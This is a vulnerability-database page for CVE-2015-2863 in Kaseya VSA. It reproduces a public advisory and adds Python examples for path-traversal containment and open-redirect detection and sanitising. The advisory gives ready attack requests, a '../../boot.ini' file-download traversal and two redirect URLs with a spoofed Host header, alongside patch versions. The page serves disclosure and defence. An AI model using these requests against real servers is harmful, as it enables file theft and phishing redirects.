CVE-2015-2863
Description
Open redirect vulnerability in Kaseya Virtual System Administrator (VSA) 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
Mitigations
No workaround is published; the fix is the vendor patch for the branch in use: 7.0.0.29 (7.x), 8.0.0.18 (8.x), 9.0.0.14 (9.0) or 9.1.0.4 (9.1), as listed under Fix in the advisory below.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (1)
>> Multiple vulnerabilities in Kaseya Virtual System Administrator
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 13/07/2015 / Last updated: 28/09/2015
>> Background on the affected product:
"Kaseya VSA is an integrated IT Systems Management platform that can be leveraged seamlessly across IT disciplines to streamline and automate your IT services. Kaseya VSA integrates key management capabilities into a single platform. Kaseya VSA makes your IT staff more productive, your services more reliable, your systems more secure, and your value easier to show."
A special thanks to CERT and ZDI for assisting with the vulnerability reporting process.
These vulnerabilities were disclosed by CERT under ID 919604 [1] on 13/07/2015.
>> Technical details:
#1
Vulnerability: Arbitrary file download (authenticated)
CVE-2015-2862 / CERT ID 919604
Affected versions: unknown, at least v7 to v9.1
GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini
Referer: http://10.0.0.3/
A valid login is needed, and the Referer header must be included. A sample request can be obtained by downloading any file attached to any ticket, and then modifying it with the appropriate path traversal.
This will download the C:\boot.ini file when Kaseya is installed in the default C:\Kaseya directory. The file download root is the WebPages directory (<Kaseya_Install_Dir>\WebPages\).
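As an added illustration (not part of the advisory) of why the Downloader.ashx request above escapes the WebPages root, and of the containment check such a handler needs, the following Python reproduces the path arithmetic offline. The install root, the attachment name and the helper names are assumptions for this example; only the default C:\Kaseya layout and the WebPages download root come from the advisory.

```python
import ntpath

# Constructed example root: the WebPages directory of a default Kaseya install,
# which the advisory names as the download root.
WEB_ROOT = r"C:\Kaseya\WebPages"


def resolve_download(root: str, filepath: str) -> str:
    """What a naive handler opens for a user-supplied filepath parameter:
    join under root, then normalise. ntpath is used so the Windows path
    rules apply regardless of the OS this example runs on. A filepath of
    '../../boot.ini' collapses to C:\\boot.ini, and an absolute filepath
    discards root entirely (ntpath.join restarts at a drive letter)."""
    return ntpath.normpath(ntpath.join(root, filepath))


def is_inside_root(root: str, resolved: str) -> bool:
    """Containment check: the resolved path must lie strictly below root.
    Windows paths compare case-insensitively, so compare lower-cased and
    require the trailing separator so 'C:\\Kaseya\\WebPagesX' does not pass."""
    root_n = ntpath.normpath(root).rstrip("\\").lower() + "\\"
    return resolved.lower().startswith(root_n)


def safe_download_path(root: str, filepath: str):
    """Hardened variant (hypothetical, not the vendor's patch): returns the
    resolved path when it stays under root, otherwise None."""
    resolved = resolve_download(root, filepath)
    return resolved if is_inside_root(root, resolved) else None


if __name__ == "__main__":
    for candidate in ("attachments/ticket1.txt", "../../boot.ini",
                      r"..\..\Windows\win.ini", r"C:\boot.ini"):
        print(f"{candidate!r:32} -> naive {resolve_download(WEB_ROOT, candidate)!r}, "
              f"checked {safe_download_path(WEB_ROOT, candidate)!r}")
```

Note that normalising first and checking the prefix afterwards is what makes the check work: checking for ".." substrings before normalisation misses forward-slash, mixed-separator and absolute-path variants.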
#2
Vulnerability: Open redirect (unauthenticated)
CVE-2015-2863 / CERT ID 919604
Affected versions: unknown, at least v7 to v9.1
a) http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com
b) GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com
   Host: www.google.com
   (the Host header has to be spoofed to the redirect destination, as shown)
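To turn the two entry points above into a repeatable check, and to show the server-side validation that closes an open redirect, here is an added Python example that is not part of the advisory. It builds the two probe requests without sending them, classifies a captured response by its Location header, and includes a same-origin allowlist for the redirect parameter. The target host, the canary URL, the response fixtures and the function names are all constructed for this example; Kaseya's actual patch is not published on this page, so the sanitiser is a generic hardening pattern rather than the vendor's code.

```python
from urllib.parse import urlencode, urlsplit

# Constructed hostnames for the example; the advisory used 192.168.56.101.
TARGET = "vsa.example.test"
CANARY = "http://canary.example.test/"


def build_probes(target_host: str, canary: str = CANARY) -> list:
    """The two unauthenticated entry points from the advisory as
    (method, path, headers). Variant (b) needs Host set to the destination
    host rather than the VSA server, as the advisory notes."""
    return [
        ("GET", "/inc/supportLoad.asp?" + urlencode({"urlToLoad": canary}),
         {"Host": target_host}),
        ("GET", "/vsaPres/Web20/core/LocalProxy.ashx?" + urlencode({"url": canary}),
         {"Host": urlsplit(canary).netloc}),
    ]


def classify_redirect(target_host: str, status: int, headers: dict) -> str:
    """Classify one captured response (send probes with redirects disabled):
    'open-redirect' when a 3xx Location points off-host, 'local' when it stays
    on target_host or is an absolute path, 'none' when there is no redirect."""
    loc = next((v for k, v in headers.items() if k.lower() == "location"), None)
    if loc is None or not 300 <= status < 400:
        return "none"
    parts = urlsplit(loc)
    if parts.netloc == "" and loc.startswith("/") and not loc.startswith("//"):
        return "local"
    if parts.netloc.lower() == target_host.lower():
        return "local"
    return "open-redirect"


def sanitize_redirect(user_url: str, allowed_host: str, default: str = "/") -> str:
    """Hypothetical server-side fix: accept only an absolute path on this site
    or an http(s) URL whose host is exactly allowed_host, and reduce the latter
    to path+query so the response never carries an attacker-chosen origin.
    Everything else (other hosts, '//host', backslash tricks, 'javascript:',
    header-injection characters) falls back to a fixed default."""
    if "\\" in user_url or "\r" in user_url or "\n" in user_url:
        return default
    parts = urlsplit(user_url)
    if parts.scheme == "" and parts.netloc == "":
        return user_url if user_url.startswith("/") else default
    if (parts.scheme in ("http", "https") and parts.hostname
            and parts.hostname.lower() == allowed_host.lower()):
        path = parts.path or "/"
        return path + ("?" + parts.query if parts.query else "")
    return default


if __name__ == "__main__":
    for method, path, headers in build_probes(TARGET):
        print(method, path, headers)
    # Constructed responses standing in for what a vulnerable and a patched
    # server would return to probe (a).
    print(classify_redirect(TARGET, 302, {"Location": CANARY}))
    print(classify_redirect(TARGET, 302, {"Location": "/inc/support.asp"}))
    print(sanitize_redirect("http://www.google.com", TARGET))
```

When running the probes for real, disable automatic redirect following in the client; otherwise the off-host Location header is consumed before you can inspect it, and the check reports the canary's page instead of the vulnerable hop.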
>> Fix:
R9.1: install patch 9.1.0.4
R9.0: install patch 9.0.0.14
R8.0: install patch 8.0.0.18
V7.0: install patch 7.0.0.29
>> References:
[1] https://www.kb.cert.org/vuls/id/919604
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
Application impact
| Vendor | Product | Affected versions | Fixed |
|---|---|---|---|
| kaseya | virtual_system_administrator | 7.0 <= version < 7.0.0.29 | 7.0.0.29 |
| kaseya | virtual_system_administrator | 8.0 <= version < 8.0.0.18 | 8.0.0.18 |
| kaseya | virtual_system_administrator | 9.0 <= version < 9.0.0.14 | 9.0.0.14 |
| kaseya | virtual_system_administrator | 9.1 <= version < 9.1.0.4 | 9.1.0.4 |